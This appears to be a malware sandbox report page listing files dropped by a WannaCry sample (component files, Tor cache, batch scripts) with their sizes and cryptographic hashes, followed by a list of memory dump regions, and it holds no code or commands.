8fca77e54480aea3c0c7a705263ed8fb83c58974f5f0f62f12cc97c8e0506ba2cdb59b70e59e9a6c44dd7cde6adeeec35b494d31a6a146ff5ba7006136ab9386

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\r.wnry

Filesize
864B

MD5
3e0020fc529b1c2a061016dd2469ba96

SHA1
c3a91c22b63f6fe709e7c29cafb29a2ee83e6ade

SHA256
402751fa49e0cb68fe052cb3db87b05e71c1d950984d339940cf6b29409f2a7c

SHA512
5ca3c134201ed39d96d72911c0498bae6f98701513fd7f1dc8512819b673f0ea580510fa94ed9413ccc73da18b39903772a7cbfa3478176181cee68c896e14cf

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\s.wnry

Filesize
2.9MB

MD5
ad4c9de7c8c40813f200ba1c2fa33083

SHA1
d1af27518d455d432b62d73c6a1497d032f6120e

SHA256
e18fdd912dfe5b45776e68d578c3af3547886cf1353d7086c8bee037436dff4b

SHA512
115733d08e5f1a514808a20b070db7ff453fd149865f49c04365a8c6502fa1e5c3a31da3e21f688ab040f583cf1224a544aea9708ffab21405dde1c57f98e617

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\t.wnry

Filesize
64KB

MD5
5dcaac857e695a65f5c3ef1441a73a8f

SHA1
7b10aaeee05e7a1efb43d9f837e9356ad55c07dd

SHA256
97ebce49b14c46bebc9ec2448d00e1e397123b256e2be9eba5140688e7bc0ae6

SHA512
06eb5e49d19b71a99770d1b11a5bb64a54bf3352f36e39a153469e54205075c203b08128dc2317259db206ab5323bdd93aaa252a066f57fb5c52ff28deedb5e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\taskdl.exe

Filesize
20KB

MD5
4fef5e34143e646dbf9907c4374276f5

SHA1
47a9ad4125b6bd7c55e4e7da251e23f089407b8f

SHA256
4a468603fdcb7a2eb5770705898cf9ef37aade532a7964642ecd705a74794b79

SHA512
4550dd1787deb353ebd28363dd2cdccca861f6a5d9358120fa6aa23baa478b2a9eb43cef5e3f6426f708a0753491710ac05483fac4a046c26bec4234122434d5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\taskse.exe

Filesize
20KB

MD5
8495400f199ac77853c53b5a3f278f3e

SHA1
be5d6279874da315e3080b06083757aad9b32c23

SHA256
2ca2d550e603d74dedda03156023135b38da3630cb014e3d00b1263358c5f00d

SHA512
0669c524a295a049fa4629b26f89788b2a74e1840bcdc50e093a0bd40830dd1279c9597937301c0072db6ece70adee4ace67c3c8a4fb2db6deafd8f1e887abe4

Download Submit
C:\Users\Admin\AppData\Local\Temp\Temp1_WannaCry-main.zip\WannaCry-main\u.wnry

Filesize
240KB

MD5
7bf2b57f2a205768755c07f238fb32cc

SHA1
45356a9dd616ed7161a3b9192e2f318d0ab5ad10

SHA256
b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25

SHA512
91a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_a5lqpt0u.wjp.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\cf2f05ac-586e-4d9a-a3eb-2dd2c0f3ec03.tmp

Filesize
1B

MD5
5058f1af8388633f609cadb75a75dc9d

SHA1
3a52ce780950d4d969792a2559cd519d7ee8c727

SHA256
cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8

SHA512
0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir5432_9891073\62499507-df61-443c-becc-9c7d63a4bc42.tmp

Filesize
150KB

MD5
14937b985303ecce4196154a24fc369a

SHA1
ecfe89e11a8d08ce0c8745ff5735d5edad683730

SHA256
71006a5311819fef45c659428944897184880bcdb571bf68c52b3d6ee97682ff

SHA512
1d03c75e4d2cd57eee7b0e93e2de293b41f280c415fb2446ac234fc5afd11fe2f2fcc8ab9843db0847c2ce6bd7df7213fcf249ea71896fbf6c0696e3f5aee46c

Download Submit
C:\Users\Admin\AppData\Local\Temp\scoped_dir5432_9891073\CRX_INSTALL\_locales\en\messages.json

Filesize
711B

MD5
558659936250e03cc14b60ebf648aa09

SHA1
32f1ce0361bbfdff11e2ffd53d3ae88a8b81a825

SHA256
2445cad863be47bb1c15b57a4960b7b0d01864e63cdfde6395f3b2689dc1444b

SHA512
1632f5a3cd71887774bf3cb8a4d8b787ea6278271657b0f1d113dbe1a7fd42c4daa717cc449f157ce8972037572b882dc946a7dc2c0e549d71982dcdee89f727

Download Submit
C:\Users\Admin\AppData\Roaming\tor\cached-microdescs.new

Filesize
8.0MB

MD5
7f3e42510b4170b4539995b2f2a8229a

SHA1
21122e4d3e6e38a235c8f02b6df5815c80efd609

SHA256
0fc9f5f722a96e702ec71da293f1af50ead9920d6f22f15f10975e9e02b3fb0c

SHA512
ed6f23d1095968b7038789bff827d5b1bc13573abbb51005a2e6ed53fc0b84e981f8f6f4dc647ed8c1e791cb6db5a4c7f8851345122d9c915fd8e315fdd2b24d

Download Submit
C:\Users\Admin\Downloads\WannaCry-main.zip

Filesize
3.3MB

MD5
3c7861d067e5409eae5c08fd28a5bea2

SHA1
44e4b61278544a6a7b8094a0615d3339a8e75259

SHA256
07ecdced8cf2436c0bc886ee1e49ee4b8880a228aa173220103f35c535305635

SHA512
c2968e30212707acf8a146b25bb29c9f5d779792df88582b03431a0034dc82599f58d61fc9494324cc06873e5943f8c29bffd0272ca682d13c0bb10482d79fc5

Download Submit
C:\Windows\IME\activator.bat

Filesize
3KB

MD5
365b88395524dec0af52387ed73317ce

SHA1
66a6e96fb198e8749c9086e35b2b2f85aa21c63c

SHA256
99ada36422b17257eba9d9cc5d123907589f638aa9564bc8fb000261cc9c1c10

SHA512
46efce6af2a90ace25842fd0d85212463c3b6ba2a6f8e089ee29381d960a745a278b86b49bf3330d686b140e3fc66c9cc8ac70df7f05d8e0ecac694dc542cff5

Download Submit
C:\Windows\IME\permissions.bat

Filesize
162B

MD5
4be7ca8b30ea192628228857b5005655

SHA1
588a60df54f8ff2924b2fd569dfc39ce5ae17cfd

SHA256
5e56203e437e3a219fcc9f295c8bcf31961585de816212ce0a6a306a465bc853

SHA512
169b735f5b72ff12910451cf9fbab231b0d9e8b9481f9e01824e5c85075caf17283bb4a54353a9c5958c5ff7eebc6dc932630c1e824be5ebe416bc608306c7b4

Download Submit
C:\Windows\IME\reset.bat

Filesize
325B

MD5
939378e1c9e25f424c618a379e61fc48

SHA1
45822124d56b6e6efcfbaab246feff695b7098d4

SHA256
fd805584b817ad0b320c85653a5bd7342650359feae60e5a3e722d5571542146

SHA512
3833f14692f5cdfea285654f91ac814a89bf189a4db99b0fc1e817905d9929f6f4b184db5a51269f9b82170a14af2c5e0510150201cea03177cab04fb26494fb

Download Submit
memory/2040-15-0x000001B6E4360000-0x000001B6E436A000-memory.dmp

Filesize
40KB

Download
memory/2040-14-0x000001B6E4660000-0x000001B6E4762000-memory.dmp

Filesize
1.0MB

Download
memory/2040-8-0x000001B6E4330000-0x000001B6E4352000-memory.dmp

Filesize
136KB

Download
memory/2040-13-0x000001B6CA0E0000-0x000001B6CA0F0000-memory.dmp

Filesize
64KB

Download
memory/2040-2-0x000001B6E43C0000-0x000001B6E444A000-memory.dmp

Filesize
552KB

Download
memory/5068-460-0x0000000010000000-0x0000000010010000-memory.dmp

Filesize
64KB

Download
memory/5612-1946-0x0000000000920000-0x0000000000C1E000-memory.dmp

Filesize
3.0MB

Download
memory/5612-1859-0x0000000074170000-0x00000000741F2000-memory.dmp

Filesize
520KB

Download
memory/5612-1862-0x0000000074010000-0x0000000074032000-memory.dmp

Filesize
136KB

Download
memory/5612-1863-0x0000000000920000-0x0000000000C1E000-memory.dmp

Filesize
3.0MB

Download
memory/5612-1860-0x0000000073DF0000-0x000000007400C000-memory.dmp

Filesize
2.1MB

Download
memory/5612-1861-0x00000000740C0000-0x0000000074142000-memory.dmp

Filesize
520KB

Download
memory/5612-1896-0x0000000000920000-0x0000000000C1E000-memory.dmp

Filesize
3.0MB

Download
memory/5612-1902-0x0000000073DF0000-0x000000007400C000-memory.dmp

Filesize
2.1MB

Download
memory/5612-1901-0x0000000074010000-0x0000000074032000-memory.dmp

Filesize
136KB

Download
memory/5612-1900-0x0000000074040000-0x00000000740B7000-memory.dmp

Filesize
476KB

Download
memory/5612-1899-0x00000000740C0000-0x0000000074142000-memory.dmp

Filesize
520KB

Download
memory/5612-1898-0x0000000074150000-0x000000007416C000-memory.dmp

Filesize
112KB

Download
memory/5612-1897-0x0000000074170000-0x00000000741F2000-memory.dmp

Filesize
520KB

Download
memory/5612-1916-0x0000000000920000-0x0000000000C1E000-memory.dmp

Filesize
3.0MB

Download
memory/5612-2696-0x0000000000920000-0x0000000000C1E000-memory.dmp

Filesize
3.0MB

Download
memory/5612-1952-0x0000000073DF0000-0x000000007400C000-memory.dmp

Filesize
2.1MB

Download
memory/5612-1994-0x0000000000920000-0x0000000000C1E000-memory.dmp

Filesize
3.0MB

Download
memory/5612-2000-0x0000000073DF0000-0x000000007400C000-memory.dmp

Filesize
2.1MB

Download
memory/5612-2068-0x0000000000920000-0x0000000000C1E000-memory.dmp

Filesize
3.0MB

Download
memory/5612-2074-0x0000000073DF0000-0x000000007400C000-memory.dmp

Filesize
2.1MB

Download
memory/5612-2611-0x0000000000920000-0x0000000000C1E000-memory.dmp

Filesize
3.0MB

Download
memory/5612-2617-0x0000000073DF0000-0x000000007400C000-memory.dmp

Filesize
2.1MB

Download
memory/5612-2651-0x0000000000920000-0x0000000000C1E000-memory.dmp

Filesize
3.0MB

Download